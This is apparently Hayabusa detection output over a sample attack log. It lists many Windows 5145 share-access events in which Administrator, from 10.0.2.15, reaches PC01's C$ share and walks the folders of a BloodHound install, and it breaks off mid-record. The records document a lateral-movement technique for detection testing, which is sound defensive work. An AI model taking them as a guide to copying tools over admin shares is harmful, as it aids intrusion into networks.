14:23:24.057 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.057 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\Ingestors | IP Addr: 10.0.2.15 
| LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.057 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\Ingestors\DebugBuilds | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.057 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.067 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.067 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.067 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime\helpers | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.077 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime\node_modules | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.077 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime\regenerator | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.087 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.087 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.087 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\css | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.087 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\js | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.097 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\less | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.097 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\scss | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.107 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\sprites | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.107 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\svgs | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.107 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share 
Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\webfonts | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.117 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@types | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.117 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\adler-32 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.117 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\adler-32\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.127 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: 
\??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\adler-32\types | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.127 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.137 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\.nyc_output | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.137 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.137 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.147 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\examples\src | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.147 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.147 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\src | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.147 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\tests | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.157 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\asap | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.157 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\async | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.167 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\async\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.167 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\async\internal | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.177 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.177 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.177 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\array | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.187 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\error | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.187 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\json | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.197 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\math | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.197 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\number | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.197 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: 
\??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\object | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.197 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\reflect | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.207 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\regexp | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.207 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\string | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.207 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: 
\\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\symbol | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.217 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\system | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.217 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\helpers | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.227 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\regenerator | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.227 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share 
Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\balanced-match | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.227 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\big-integer | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.237 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.237 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\example | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.237 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.237 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\perf | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.247 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\test | IP Addr: 10.0.2.15 | LID: 